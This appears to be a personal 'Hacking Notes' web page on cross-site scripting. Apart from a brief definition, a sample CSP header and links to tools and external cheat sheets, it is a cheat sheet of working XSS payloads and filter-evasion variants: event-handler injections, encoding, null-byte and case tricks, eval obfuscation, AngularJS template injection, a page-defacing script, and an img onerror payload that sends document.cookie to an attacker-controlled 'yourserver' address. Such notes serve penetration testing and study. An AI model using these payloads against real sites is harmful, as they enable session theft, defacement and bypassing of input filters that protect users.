Hacking Notes | Welcome 👋

What is XSS

Cross-Site Scripting (XSS) is a type of security vulnerability that occurs when an attacker is able to inject malicious scripts into a website, which are then executed in the browser of users who visit that site. This type of attack exploits the trust a user has in a website and can lead to unauthorized actions being taken on behalf of the victim or the exposure of sensitive data.

Exploitation

Content Security Policy (CSP)

Content-Security-Policy: default-src 'none'; script-src 'self'; style-src 'self'; img-src 'self';

Type

# Normal

<script>alert('xss')</script>
<img src=x onerror=alert('1')>
<><img src=x onerror=alert(1)>
javascript:alert(%27xss%27)
<body onrezise=alert(1)>                                   ---> Other HTML Tags
<xss id=x onfocus=alert(document.cookie) tabindex=1>#x';   ---> No HTML tag
  |_____ tabindex -> Make element focusable (Not all HTML elements focusable)

---------------------------------------------------------------------------------
# IMG

<img src=x>
<img src=1 onerror=alert(1)>
<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>

<svg> <animatetransform onbegin=alert(1) attributeName=transform>
<svg> ---> https://github.com/allanlw/svg-cheatsheet (VERY POWERFULL)

---------------------------------------------------------------------------------
# HREF

href
href="javascript:alert(1)"

---------------------------------------------------------------------------------
# Hash Change

<iframe src="https://domain.com/#" onload="this.src+='<img src=x onerror=alert(1)>'"></iframe>

---------------------------------------------------------------------------------
# Canonical

<link rel="canonical" href="https://web.com/?" accesskey="x" onclick="alert(1)">
  |_____ accesskey="x" onclick="alert(1) --> When press key "ALT X" pop XSS
  
---------------------------------------------------------------------------------
# Other JS Language

## AngularJS

<body ng-app="" class="ng-scope">               ---> Interested in the ng-app
{{$on.constructor("alert(1)")()}}

---------------------------------------------------------------------------------
# DOM
location.search      ---> Search in the URL for a parameter
write.document       ---> This will write to the HTML (Adding something depending on the code)

Evasion

# Combinaison
‘`”//> <SCRIPT BLABLABLA>    ---> Combinaison of the most popular evasion

---------------------------------------------------------------------------------
# Encoding (Possible to encode mutiples times)
urlencode "http://example.com/?param=linux+url+encoder"

<img onerror=&#34alert(1)&#34src=x>
<img onerror=&#39alert(1)&#39src=x>

<script>Encoding</script>  ---> %3Cscript%3EEncoding%3C%2Fscript%3E

---------------------------------------------------------------------------------
# Basic Modification

## Encoded tabs/newlines/CR
<script&#9>alert(1)</script>
<script&#10>alert(1)</script>
<script&#13>alert(1)</script>

## Capital letters
<ScRipT>alert(1)</sCriPt>

## If angle brackets are encoded
-alert(1)-  ---> (-) replace (> or <)

---------------------------------------------------------------------------------
# Adding Nullbytes

<%00script>alert(1)</script>
<scr%00ipt>alert(1)</script>

---------------------------------------------------------------------------------
# Attributes and Tags

<input type="text" name="input" value="hello" >
<input type="text" name="input" value=">< script >alert(1)</script>
<randomtag type="text" name="input" value=">< script >alert(1)</script>
<input/type="text" name="input" value=">< script >alert(1)</script>
<input&#9type="text" name="input" value=">< script >alert(1)</script>
<input&#10type="text" name="input" value=">< script >alert(1)</script>
<input&#13type="text" name="input" value=">< script >alert(1)</script>
<input/'type="text" name="input" value=">< script >alert(1)</script>
<iNpUt type="text" name="input" value=">< script >alert(1)</script>

---------------------------------------------------------------------------------
# Attributes Nullbytes

<%00input type="text" name="input" value="><script>alert(1)</script>
<inp%00ut type="text" name="input" value="><script>alert(1)</script>
<input t%00ype="text" name="input" value="><script>alert(1)</script>
<input type="text" name="input" value="><script>a%00lert(1)</script>

---------------------------------------------------------------------------------
# Event Handler

<input onsubmit=alert(1)>

---------------------------------------------------------------------------------
# Delimiters & Backticks and Brakers

## () to Backticks
<img onerror="alert(1)"src=x>
<img onerror='alert(1)'src=x>

## Backticks
	<img onerror=`alert(1)`src=x>
	
## Encoded backtics
	<img onerror=&#96alert(1)&#96src=x>

## Double use of delimiters
	<<script>alert(1)//<</script>

## Unknown delimiters
	«input onsubmit=alert(1)»

---------------------------------------------------------------------------------
# Oval ()

<script>eval('a\u006cert(1)')</script>
<script>eval('al' + 'ert(1)')</script>
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))</script>    

---------------------------------------------------------------------------------
# Word Filter (If some javascript element is filtered)

<scrscriptipt > might become <script>

---------------------------------------------------------------------------------
# HTML Defacing

<script>document.querySelector('#thm-title').textContent = 'Im a hacker'</script>

HTML DOM Events

General Tools

XSS Hunter ---> https://xsshunter.trufflesecurity.com/app/#/ (opens in a new tab)
Manual Testing

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet (opens in a new tab) (VERY GOOD) https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html (opens in a new tab)

Cvss